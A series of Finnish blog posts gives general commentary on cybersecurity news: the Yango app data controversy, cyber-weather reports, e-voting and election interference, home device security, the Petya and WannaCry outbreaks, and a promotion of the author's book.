Uutistekstin mukaan Yangon taksisovellus "ottaa haltuunsa valtavan määrän käyttäjädataa". Ilmeisesti tällä tarkoitetaan, että sovellus pyytää oikeuksia mm. osoitekirjaan, sosiaaliseen mediaan ja tekstiviesteihin. Uutinen ei kerro toimiiko sovellus, jos oikeuksia ei anna. Joillekin oikeuksille löytyy perusteluita, esimerkiksi sijaintitieto on tarpeellinen ja matkan voi ehkä jakaa sosiaalisen median kautta ystäville. Vanhemmissa Android-versioissa oikeuksien luokittelu on epätarkkaa, jolloin lupakysymys näyttää epätarkalta.

Uutisen mukaan sovellus jatkoi aktiivisena lopettamisen jälkeenkin ja lähetti "erittäin hyvin kryptattua dataa jonnekin EU:n ulkopuolelle". Toisaalta "todellisuudessa käyttäjädataa siirrettiin kryptattuna Venäjälle". Jos data oli kryptattua, mistä tiedettiin sen olevan käyttäjädataa? Monet sovellukset keräävät ns. telemetriatietoa sovellusten käytöstä, tunnetuimpana Windows 10:stä noussut kohu.

On myös epäselvää, mitä sovelluksen lopettaminen tässä tarkoittaa. Mobiilisovelluksia ei yleensä tarvitse lopettaa, vaan ne jäävät tausta-ajoon ja käyttöjärjestelmä huolehtii niiden hallinnasta itse. Joissakin sovelluksissa on erityinen lopetuskomento. Jos Yango näyttää loppuvan, mutta jättää silti itsensä taustalle, toiminta herättää epäilyksiä.

Tiedonsiirto oli "jäljitetty" jonnekin Jekaterinburgin ja Moskovan tienoille. Heikkoa on venäläisten osaaminen, jos eivät pysty tämän paremmin siirron kohdetta piilottamaan. Siihen riittäisi datan kierrättäminen vaikka Mäntsälän datakeskuksen kautta. Tai sitten Latvia oli saanut tiedusteluapua esimerkiksi NSA:lta, jota se ei voinut julkisesti kertoa.

Epämääräiset väitteet herättävät kysymyksiä. Liettuan varapuolustusministeri kehottaa Suomen kyberturvallisuuskeskusta ottamaan yhteyttä, jotta he voivat jakaa tietonsa suomalaisille. On hyvin erikoista, että viranomaisten välinen yhteydenpito tapahtuu tv-uutisten kautta, mutta toivottavasti Suomen viranomaiset tarttuvat pyyntöön ja selvittävät asian.

"Ottakaa yhteyttä meidän kuberturvallisuuskeskukseemme".
Ehkä kyseessä on Venäjän salakavala urkintasovellus, ehkä uutisankka. Suomalaisilla on oikeus tietää. Sitä edellyttää myös kansallinen tavoite kyberturvallisuuden vahvistamisesta ja GDPR-lain valvonta.

Kyberturvallisuuskeskus vetoaa siihen, ettei heillä ole resursseja yksittäisen sovelluksen tutkimiseen. Ei varmaan olekaan, mutta F-Securen toimisto on Salmisaaressa ja Nixu muutaman kilometrin päässä Otaniemessä. Ennen Kyberturvallisuuskeskus oli kivenheiton päässä näistä, mutta muutti äskettäin toiselle puolelle Helsinkiä Kumpulaan. Muitakin alan yrityksiä löytyy. Eikö heiltä voi ostaa konsultointia asiassa?

PS. Suuri Yandexin datakeskusta työllistää Suomessa vain 17 henkilöä. Ei Suomen kannata lisätä hiilidioksidipäästöjä ja alentaa sähköveroa ainakaan työllisyyssyistä. Mukana voi tulla myös yllättäviä seurauksia, kuten nyt kiista siitä, pitääkö tietosuoja-asiaa selvittää yhtiön pääkonttorin vai datakeskuksen sijaintimaassa. Jatkossa datan sijaintiin voi liittyä myös kansallisen turvallisuuden ja juridiikan kysymyksiä.

Muokattu 14.11.2018

Lisäys 22.11.2018: Tietoturvatutkijan mukaan Yangossa on sisäänrakennettu puheentunnistusominaisuus, joka lähettää dataa Venäjälle. Kiinnostavaa. Kuuntelisiko ohjelma salaa puhelimen ympärillä tapahtuvia keskusteluja? 

perjantai 12. lokakuuta 2018

Uutiset ja sää -- sekä kybersää

Nordic Cyber Security -tilaisuudessa tuli eilen ehdotus kybersäätilan raportoinnista. Kyse on Viestintäviraston tietoturvapalvelusta, joka raportoi kuukausittain ajankohtaisista verkko- ja tietoturvauhkista.

Sää-termi on hieman epähavainnollinen, sillä tämä säätila kerrotaan jälkikäteen. Se ei siis ole varsinainen ennuste. Tuorein syyskuun 2018 kybersää näyttää tältä:
Edellisen kuukauden kybersää
Huijaukset & kalastelut -alue näyttää synkältä, on salamointia ja tummia pilviä. IoT-alueella tihkusadetta, samoin vakoilussa, palvelunestoissa ja haittaohjelmissa. Verkkojen toimivuus erottuu edukseen: puolipilvinen sää, josta aurinkokin pääsee kurkistamaan. Viestintäviraston käyttämä analogia säätietoihin on oivallinen ja hauska.

Jarna Hartikainen lukemassa edelliseen kuun kybersäätä 11.10.2018.
Televisiossa luetaan joka ilta uutisia ja kyllästymiseen asti samoja säätietoja sekä joutavia urheilutuloksia. Mitä jos urheilun sijaan jossain lähetyksessä olisikin kybersää? Katsojia varoitettaisiin juuri silloin ajankohtaisista kalastelu- ja pankkihuijauksista. Loppuun voisi laittaa vaikka hauskan tietoiskun salasanojen tai varmuuskopioiden merkityksestä.

Suomi pitää itseään edistyneenä it-maana, mutta uskomme lepää vanhojen saavutusten ja Nokian matkapuhelinten jälkihehkun varassa. Emme ole aikoihin tehneet mitään omaperäistä tai rohkeaa.

Tietoturvan tuominen sään ja urheilun rinnalle olisi juuri sopiva konkreettinen toimi kyberturvan ja kansallisen turvallisuuden kohentamiseksi. 

lauantai 29. syyskuuta 2018

Sähköinen äänestäminen ei ole se suurin ongelma

Suomessa vallitsee kiitettävä yksimielisyys siitä, että vaalit pitää toimittaa lippuäänestyksenä. Sähköinen äänestys olisi liian kyberturvatonta ja mahdollistaisi ääntenlaskennan manipuloinnin. Virolaisia tämä seikka ei tosin haittaa ja verkkoäänestys on toiminut useissa vaaleissa ongelmitta.

Tiedän hyvin sähköisen äänestämisen riskit. Käsittelin niitä Kyberuhkia ja somesotaa -kirjassani monen sivun edestä. Kiinnostavin havainto oli, miten paljon virheitä perinteinen lippuäänestys on aiheuttanut. Ruotsin paikallisvaaleissa ulkopuoliset voivat helposti nähdä, mille puolueelle ääni on mennyt, eikä tätä pidetä maassa ongelmana. Turvallisuus on tunne ja tottumiskysymys, ei eksaktia tiedettä.

Lippuäänestyksen ongelmat eivät tietenkään ole argumentti sähköisen äänestyksen puolesta. Virheitä tuottavan järjestelmän korvaaminen vielä enemmän virheitä ja riskejä tuottavalla ei ole mikään perustelu.

Olen samaa mieltä: aika ei ole kypsä sähköiselle äänestykselle.

Mutta asiaan liittyy ajatusharha, jota käsittelen kirjassakin. Liiallinen huomion kiinnityminen sähköisen äänestyksen riskeihin johtaa siihen, että unohdamme kokonaiskuvan. Olipa äänestys sitten lipuilla tai netissä, tulos on oikea vain, mikäli koko vaalia edeltänyt ketju on aukottoman turvallinen.

Niin ei selvästikään ole. Yhdysvalloissa Trumpin voittoon vaikuttivat Venäjän somemainonta ja DNC-tietomurto sekä Cambridge Analyticalta ostettu mikrokohdentaminen. Jos kampanjointi ja vaalimainonta eivät toimi reilusti, on melko sama äänestetäänkö lipuilla, netissä vai huutoäänestyksellä.

Tämä ei ole pelkkä USA:n ongelma.Kirjaan ei mahtunut mielenkiintoinen case kolumbialaisesta hakkerista nimeltä Andres Sepulveda, joka maksua vastaan vääristi vaalikampanjointia useissa eteläamerikkalaisissa valtioissa lähes kymmenen vuoden ajan ennen kiinnijäämistään. Nyt hän istuu vankeustuomiotaan. Lue vaikka Bloombergin juttu How to Hack an Election niin saat perspektiiviä vaalivaikuttamiseen.

Suomessa on ensi vuonna useammat vaalit. Sen sijaan, että korostamme vaalien olevan luotettavat, koska ne perustuvat vanhaan lippuäänestykseen, meidän pitää kiinnittää paljon enemmän huomiota kaikkeen siihen, mitä tapahtuu ennen äänestystä.

Ja se on paljon vaikeampi tehtävä. Osaammeko edes kuvitella, millä kaikilla tavoilla vaalityötä vääristellään ja mikä on kykymme huomata tällaiset manipulointiyritykset?

keskiviikko 26. syyskuuta 2018

Digitaalinen maanpuolustus - koko kansan asia

Jatkan vielä hetken aikaa bloggauksia liittyen Kyberuhkia ja somesotaa -kirjani teemoihin.

Termi "digitaalinen maanpuolustus" nousi mieleeni, kun tutkin miten varautuminen ja puolustautuminen ulkopuolisia uhkia vastaan on muuttunut. Vanhassa maailmassa maan puolustamiseen varautuivat ammattilaiset ja varusmiehet, jotka koulutettiin taistelemaan suomalaisessa maastossa.

Digitalisaatio on muuttanut tämän kaiken. Olemme uudella tavalla haavoittuvia, mitä vihollinen osaa käyttää hyväkseen. Miksi vaivautua lähettämään taistelujoukkoja rajan yli tai tekemään maihinnousua rannoille, kun pelkkä infrastuktuuriin kohdistuva uhka riittäisi saamaan Suomen polvilleen? Pelkkä uhkaus tuhota Suomen sähkönjakelun avainkohdat ohjuksilla - ehkä näyttävän demonstraation kera - tekisi tehtävänsä.

Kyberhyökkäykset sähköisiä palveluita vastaan ovat uhkauksen kevyempi versio. Ehkä oli vain sattumaa, että Airiston Helmen poliisitutkinnan jälkeen Suomeen kohdistui taas palvelunestohyökkäys, joka kaatoi viranomaisten sivuja. Sivujen kaataminen ei itsessään ole vaarallista, mutta ne luovat pelon ja epävarmuuden ilmapiiriä.

Emme tiedä, kuka oli tuoreimman palvelunestohyökkäyksen takana. Kyse saattoi olla puhtaasta sattumasta, nuorukaisten typerästä tempauksesta. Mutta kun samanlainen hyökkäys osui maahamme 1,5 kuukautta sitten -- ja vieläpä samaan kohtaan -- on pakko tunnustaa, että digitaalinen maanpuolustuksemme on retuperällä. Verkkomaailman rajavalvonta ei toimi. Jatkossa resursseja pitää kohdentaa erityisesti digimaailmaan, koska siellä riskit ovat suurimmat.

Asevelvollisuus koskee vain nuoria miehiä, vapaaehtoisena myös nuoria naisia. Digitaalinen maanpuolustus koskee sen sijaan meitä kaikkia, ikään ja sukupuoleen katsomatta. Olemme kaikki etulinjassa omien älylaitteidemme vuoksi. Jokaisen kansalaisvelvollisuus on huolehtia wlan-purkin, älytelevision, valvontakameran, itkuhälyttimen ja älykkäiden kodinkoneidensa turvallisuudesta.

Jos niin ei ole tehty, laitteita voidaan käyttää hyökkäyksiin Suomea vastaan. Ulkomailta tulevat palvelunestohyökkäykset on mahdollista torjua rajoittamalla ulkomaanliikennettä. Tilanne olisi paljon hankalampi, jos merkittävä hyökkäysvolyymi tulisi kotimaisista osoitteista -- niistä suojaamattomista koti- ja yrityslaitteista, joiden asetukset ovat väärin ja päivitykset tekemättä.

Kukaan ei halua joutua tietämättään desantiksi. Siksi digitaalinen maanpuolustus on koko kansan asia.

tiistai 18. syyskuuta 2018

Kyberuhkia ja somesotaa

Kun internet alkoi yleistyä Suomessa kesällä 1994, olin innoissani. Modeemin ja tietokoneen kautta avautui aivan uusi maailma. Ilmaisten palvelujen maailmanlaajuinen verkosto kuulosti melkein liian hyvältä ollakseen totta.

Alkuvuosien kehitys näyttikin lupaavalta: sähköpostia pystyi lähettämään kenelle tahansa, maailman lehdet olivat hiiren klikkauksen päässä ja ennen kaikkea netistä pystyi hakemaan tietoa kaikista mahdollisista asioista.

Uskoin, että Jugoslavian hajoamisesta alkanut sota (1992–1999) jäisi lajinsa viimeiseksi. Jatkossa sodat kävisivät mahdottomiksi, sillä ihmiset voisivat netin kautta itse nähdä, millaista vastapuolella olisi. Silloin he ymmärtäisivät, että omien johtajien lietsomat uhkat ja pelot olivat aiheettomia, koska vastapuolella on ihan samanlaisia ihmisiä kuin he itsekin. Uskoin, että tiedon ja viestinnän vapautuminen toisi maailmaan pysyvän rauhan.

Miten lapselliselta uskoni yksinomaan hyvään kehitykseen nyt vaikuttaakaan!

Ihmiset eivät halunneetkaan etsiä netistä tietoa vaan viihdettä. Netin ilmainen sisältö lähes tappoi ammattimaisen journalismin, jonka kilpailijaksi nousivat kaikenkirjavat blogit ja valeuutiset. Sosiaalinen media söi ihmisten vapaa-ajan. Näppäimistösoturit alkoivat kamppailla vääriä mielipiteitä vastaan varmana oman näkemyksensä oikeellisuudesta.

Armeija, netin alkuperäinen rahoittaja, palasi paikalle ja alkoi hyödyntää verkkoa omalla tavallaan. Ensin tiedusteluun (Echelon) ja vakoiluun (NSA/Snowden), sitten kyberhyökkäyksiin (Stuxnet), mielipidevaikuttamiseen (Twitter-botit), presidentinvaaleihin (RIA, Trump) ja jatkossa kenties robottisotaan, IoT-hyökkäyksiin ja Deepfake-väärennöksiin.

Kukapa olisi vielä 10 vuotta sitten uskonut, että Yhdysvaltojen presidentti ohjaa maansa yleistä mielipidettä ja hoitaa ulkomaanpolitiikkaa sosiaalisessa mediassa, suoranaisia valheita levittäen? Elämme totisesti oudossa maailmassa, jossa medialukutaito, maalaisjärki ja luottamus ovat yhä tärkeämpiä yhteiskunnan tukijalkoja.

Sotimisesta on tullut niin kallista, että vain suurvalloilla ja öljymailla on siihen varaa. Kyberkeinot ovat edullisia eikä niiden käytöstä jää kiinni. Siksi kyberkeinojen merkitys kasvaa nopeasti ja niitä saatetaan käyttää myös Suomea vastaan. Tai käytetään jo nyt?

Kyberasiat pakottavat pohtimaan myös Suomen maanpuolustuksen järjestämistä. Onko asevelvollisuuteen perustuva armeija enää tätä päivää? Miksi harjoitella sotimista metsässä, jos vihollinen tulee verkkoa pitkin ja pysäyttää Suomen infrastruktuurin kyberhyökkäyksillä, haittaohjelmilla tai sabotaaseilla? Ääripäät eivät koskaan ole realistisia, mutta minkälainen kompromissi näiden uhkakuvien väliltä pitäisi valita?

Kyberuhkia ja somesotaa - digiaikana sinäkin olet etulinjassa.
Kirjani (järjestyksessään kolmaskymmenesensimmäinen) käsittelee kyberturvallisuuden, verkkovaikuttamisen ja teknisen kehityksen trendejä. Sana "kyberturvallisuus" on tylsä ja saa ihmiset haukottelemaan, mutta tähän kirjaan olen koonnut mielenkiintoisia tietoja koko laajasta digitaalisen turvallisuuden kentästä. Uskon niiden puhuttelevan lukijaa ja herättävän ajatuksia tämän päivän ja lähitulevaisuuden kehityksestä. Niin ainakin itselleni kävi kirjaa tehdessäni.

Alaotsikko "digiaikana sinäkin olet etulinjassa" viittaa kahteen asiaan. Toisaalta kotimme on täynnä älykkäitä (=haavoittuvia) digilaitteita, joita voidaan käyttää palvelunestohyökkäyksiin ja muuhun vahingontekoon, ellemme osaa suojata verkkoja ja laitteitamme. Kenenkään ei pitäisi vaarantaa tahattomasti kansallista turvallisuutta.

Toisaalta olemme kaikki etulinjassa myös informaatiovaikuttamisen suhteen. Mielipiteitämme yritetään ohjailla valeuutisilla, Twitter-boteilla, hybridivaikuttamisella, mainosten mikrokohdistamisella ja muilla tavoilla, joita emme edes huomaa.

Voidaksemme vastustaa epäasiallisia vaikutusyrityksiä meidän on pidettävä huolta kansan medialukutaidosta, yleissivistyksestä ja kansallisesta luottamuksesta, vaikka jälkimmäinen onkin kovilla. Ja jokaisen pitäisi tunnistaa omat vääristymät, jotka ohjaavat ajattelua ja saavat reagoimaan somepäivityksiin.

Kirjan voit tilata kirjakaupasta tai suoraan kustantajalta.

Korjauksia:
s. 67 Kevitsan kaivos sijaitsee Sodankylässä, ei Sotkamossa
s. 165 kolluusio p.o. kolliisio

Lisäyksiä:
s. 58 (Kaspersky) mainittu NSA:n huolimaton 68-vuotias työntekijä tuomittiin yli viideksi vuodeksi vankeuteen.

Muuta:
Lisätietoja näppärästä Fingbox-laitteesta, joka vartioi kodin wlan-verkkoa ja älykkäitä kodinkoneita.

torstai 29. kesäkuuta 2017

Petya näyttää olevan oikea kyberhyökkäys

Media viljelee mielellään kyberhyökkäys-sanaa, koska sen avulla otsikoista saa dramaattisempia. Tuore Petya (Petja) kiristysohjelma vaikuttaa kuitenkin olevan aito kyberhyökkäys, jonka toimintaa ja vaikutuksia kannattaa seurata tarkasti.

Monet seikat viittaavat siihen, ettei kiristyksen takana tällä kertaa ole pelkkiä rikollisia, vaan ohjelmalla haetaan jotain muuta:
  • Petya laitettiin levitykseen murtautumalla Ukrainassa yritysten käyttämän verosovelluksen valmistajan verkkoon. Näin ohjelma saatiin levitettyä nopeasti yrityksiin. Murto tehtiin niin taitavasti, että päivitykset levittivät sen uhreille ennen kuin yhtiö itse huomasi tapahtunutta.
  • Yrityskäyttäjien näkökulmasta vaadittu 300 euron lunnassumma on mitättömän pieni. Aiemmat kiristäjät ovat vaatineet 1-3 bitcoinia, mikä vastaisi nykykurssilla 2000-6000 euroa. Miksi rikollinen kiristäjä tyytyisi näin pieneen summaan?
  • Maksaminen on tehty vaikeaksi, koska käytössä on vain yksi bitcoin-osoite ja yhteystietona annetaan ilmainen sähköpostiosoite (joka on jo suljettu). Oikeat rosvot tekevät maksamisesta mahdollisimman helppoa. 
  • Vaikka uhri maksaisi, siitä ei ole apua, sillä alkuperäisestä Petya-kiristäjästä poiketen uusi versio tuhoaa kiintolevyn alun pysyvästi. 
Petya leviää tekniikoilla, joita käytetään vain yritysverkoissa. Sen tavoitteena näyttää siis olevan puhtaasti yritysten liiketoiminnan vahingoittaminen. Lunnasvaatimus on pelkkää kosmetiikkaa, jolla häivytetään hyökkääjien todellisia tarkoitusperiä.

Kaiken lisäksi samana aamuna, jolloin Petya alkoi levitä, Ukrainan sotilastiedustelun eversti surmattiin autopommilla.

Ukrainalainen softavalmistaja ja kansallisesti käytetty ohjelmisto, ukrainalaiset yritykset, ukrainalainen eversti... en usko kaiken olevan sattumaa. Petya on oikea kyberhyökkäys, jonka tavoitteena on vahingoittaa yhtä maata. Tästä voi päätellä sen, millaiset voimat ovat hyökkäyksen takana.

Meille muille Petya on erinomainen oppitunti kyberturvallisuuden merkityksestä. Entä jos hyökkäys olisi tehty suomalaisten yritysten käyttämän softan kautta? Miten paljon Suomen talous ja kansalaisten arki olisivat kärsineet? Panostammeko tarpeeksi digitaaliseen maanpuolustukseen, vai ovatko uhkakuvamme edelleen talvisodan vankeja?

Yksi tärkeä oppi liittyy päivityksiin. Petya osoittaa, että ne voivat olla myös vaaraksi. Asiakkaat luottavat, että päivityksen koneeseen tuoma koodi on turvallista ja sallivat sen ajamisen (toisin kuin sähköpostin tuomien tiedostoliitteiden!), mutta jos softan tekijän omiin järjestelmiin on murtauduttu, päivitykset itsessään ovat haittaohjelma. Tunnollinenkaan päivittäminen ei siten takaa tietoturvaa.

Lisäys klo 23: F-Securen tutkija varoittaa tekemästä hätäisiä johtopäätöksiä kyberhyökkäysteoriasta. Tällainen harkinta ja varovaisuus on esimerkillistä ja alan yhtiöille aivan liian harvinaista. Mutta olipa tässä kyse todellisesta hyökkäyksestä tai ei, tapaus on erittäin opettavainen, sillä juuri näin hyökkäys kannattaisi tehdä (ja kääntäen juuri tällaisiin yritysten/yhteiskunnan pitäisi pystyä varautumaan). 

maanantai 15. toukokuuta 2017

Wannacry, dagen efter

Wannacry (alias Wannacrypt tai WanaCrypt0r 2.0) on hiipunut ainakin toistaiseksi, joten on jälkipyykin aika.

Ensinnäkin hyvät uutiset: ei, digitaalista maailmanloppua ei tullut tälläkään kertaa. Raflaavista otsikoista huolimatta tämä ei ollut edes todellinen kyberhyökkäys, pikemminkin kyberrosvojen käsistä karannut kiristysohjelma. Tuskin he itsekään halusivat rikkoa yli 200 000 konetta ja aiheuttaa maailmanlaajuisen uutisen -- tieto haittaohjelmasta vähensi maksuhalukkaiden määrää. Kolmen Bitcoin-osoitteen perusteella rahaa on lähetetty vain muutaman kymppitonnin verran. Se on murto-osa pahimpien kiristäjien saaliista. Mutta ehkä osoitteita on enemmänkin?

Onko 200 000 saastunutta konetta paljon? Eipä oikeastaan. Vuosituhannen vaihteen molemmin puolin pc-koneet olivat paljon haavoittuvampia, koska netin tietoturvavaatimukset olivat vielä uutta. Loveletter-virus, Confikr, Nimda ja monet muut verkkomadot saastuttivat suhteellisesti enemmän koneita.

Ylivoimainen ykkönen lienee kuitenkin vuonna 1988 Unix-koneissa levinnyt ns. Morrisin mato, joka saastutti 10 prosenttia silloisen internetin työasemista. Mato tarttui samaan koneeseen useita kertoja, jolloin se meni polvilleen ja kaatui. Vastaava levinneisyys vaatisi tänä päivänä ehkä 200 miljoonaa uhria, ja siitä jäätiin nyt yhteen promilleen.

Wannacry oli kuitenkin edeltäjiään vaarallisempi, sillä se tuhosi työtiedostoja. Tästä näkökulmasta vahingot olivat ehkä suurempia kuin millään aiemmalla madolla. Ja ne olisivat olleet vielä paljon suurempia, jollei eräs tutkija olisi löytänyt tappokytkintä, jolla haitakkeen leviäminen pysähtyi.

Tarkka leviämistekniikka on vieläkin epäselvä. Viestintäviraston tänään päivätty tiedote kertoo, että tällä hetkellä ei ole viitteitä siitä, että haittaohjelmaa olisi levitetty Microsoft Office -haavoittuvuuden tai haitallisten sähköpostien välityksellä. Kun edes Kyberturvallisuuskeskus ei tunnu tietävän yksityiskohtia, olemme suuren epätietoisuuden edessä, kuten kyberhyökkäyksissä niin usein ennenkin. Emme tiedä, mitä tapahtui saati kuka sen teki ja miksi. Epätietoisuus on vaarallista ja korostaa tietoturvan psykologista merkitystä.

Suomessa tapauksia tuli ilmi niin vähän, ettei niitä näy edes Wikipedian kartalla:

Pohjoismaista Suomi ja Islanti puhtaina.
Suomi pelastui, emmekä edes tiedä miksi. Itse asiassa Suomi ja Islanti ovat ainoat harmaat pohjoismaat Wikipedian kartalla, ja kehittyneistä länsimaista samaan yltävät vain Andorra, Sveitsi ja Irlanti.

Britannian NHS-terveydenhuolto on saanut kovaa kritiikkiä siitä, että kustannussyistä työasemissa käytetään edelleen XP:tä, johon ei aluksi ollut turvapäivitystä. Britannia on erikoistunut terrorismin torjuntaan ja maa on Euroopan johtava valvontayhteiskunta, mutta kotirintaman kyberturvallisuus on unohdettu lyhytnäköisten säästöjen vuoksi. Eiköhän tämä tapaus herätä brititkin.

Maailma selvisi Wannacry-iskusta melkeinpä säikähdyksellä. Vaikutus olisi voinut olla paljon pahempi. Toivottavasti viikonlopun tapahtumat panevat vauhtia niihin maihin, joissa kyberturvallisuuteen panostaminen on tähän asti nähty turhana kuluna.

Oma palomuuri kertoo yhteydenottojen 445-porttiin nousseen jyrkästi heti toukokuun ensimmäisellä viikolla.
445-portti vuoden alusta tähän päivään.
Viimeinen havaintopiste kattaa vain alun kuluneesta viikosta, joten todennäköisesti käyrä nousee viikon loppuun mennessä ennätyskorkealle.